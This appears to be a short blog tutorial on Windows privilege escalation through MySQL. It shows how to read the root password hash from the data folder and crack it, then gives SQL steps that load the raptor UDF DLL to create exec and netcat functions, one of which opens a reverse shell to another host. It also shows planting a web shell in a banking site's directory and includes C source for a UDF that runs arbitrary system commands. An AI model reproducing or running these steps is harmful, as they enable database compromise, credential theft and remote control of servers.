2 Nov
Privilege Escalation With MYSQL
GOD.
Hi, Privilege Escalation in windows (from 2000 to2008) with mysql DLL & Functions.
when you Install MYSQL in windows OS , if you forgot give Permission to “DATA” folder , an attacker can read ROOT Password in mysql DATABAS .
Example :
1- Goto :
C://program files/mysql5.0.45/data/mysql
2- READ —> user.MYD
3- Crack it with CAIN & Able or any tools you have.
root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E
ok , You can read Data and crack it , for Example cracked hash of atop : “Root:123456d” .
you can use “RAPTOR” , that is ciritical exploit , Add a Dynamic Library to Mysql. This Library will infect target dll like a trojan (REVERSE SHELL , NETCAT ) .
summary of RAPTOR :
MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.
anyway , You can Connected To mysql with [asp,php,...]SHELL or PhpMyadmin or Terminal [In Example , I connected With Mysql Shell ]
Download Raptor in windows :
http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz
c:\mysql> mysql -h 192.168.0.203
- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//winudf.dll’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘c://windows//system32//winudf.dll’;
-CREATE FUNCTION netcat RETURNS integer SONAME ‘winudf.dll’;
-CREATE FUNCTION exec RETURNS integer SONAME ‘winudf.dll’;
-DROP TABLE foo;
then when you write :
select * from mysql.func;
you must see up result .
you can run Command in Administrator Privilege , [example] :
– mysql> select exec(‘echo foo > c:\\bar.txt’);
– mysql> select netcat(’192.168.0.147′);
Technical information , why This happened ?
From Mysql 5 on, there is an scheduler available similar to SQLAgent and job scheduler in Oracle, so it seems
we have something to run our scripting code once ready.
However, it is not activated by default, but we can assume to execute the backdoor using a privileged account/
so this is not a big deal.
Mysql allows the creation of procedures and functions, but there is no scripting language available, so they
are limited to SQL sentences along with basic loops and conditions. Even access to writing and reading from
disk for saving results and reading files, is limited. It seems we cannot go too far this way …
However, Mysql implements an additional functionality very convenient to us: UDF (User Defined Functions).
This allows the definition of user functions and implement them in C++, compile them and use them from
Mysql as any other function of the database. It is not necessary to recompile the full database code, as these
functions are dynamically loaded from the plugin directory (since 5.1 version) and may be used from the
database normally.
Other Attack :
with this Root Privilege in mysql , You can use ROBOTIC ARM to Move file and give them Admin Privilege!
Example :
- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//shell.aspx’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘e://hosting//ebanking//shell.php’;
Linux version :
http://www.0xdeadbeef.info/exploits/raptor_udf.c
#include <stdio.h> #include <stdlib.h> enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; typedef struct st_udf_args { unsigned int arg_count; // number of arguments enum Item_result *arg_type; // pointer to item_result char **args; // pointer to arguments unsigned long *lengths; // length of string args char *maybe_null; // 1 for maybe_null args } UDF_ARGS; typedef struct st_udf_init { char maybe_null; // 1 if func can return NULL unsigned int decimals; // for real functions unsigned long max_length; // for string functions char *ptr; // free ptr for func data char const_item; // 0 if result is constant } UDF_INIT; int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) { if (args->arg_count != 1) return(0); system(args->args[0]); return(0); }
In safeguard GOD .
Daphne .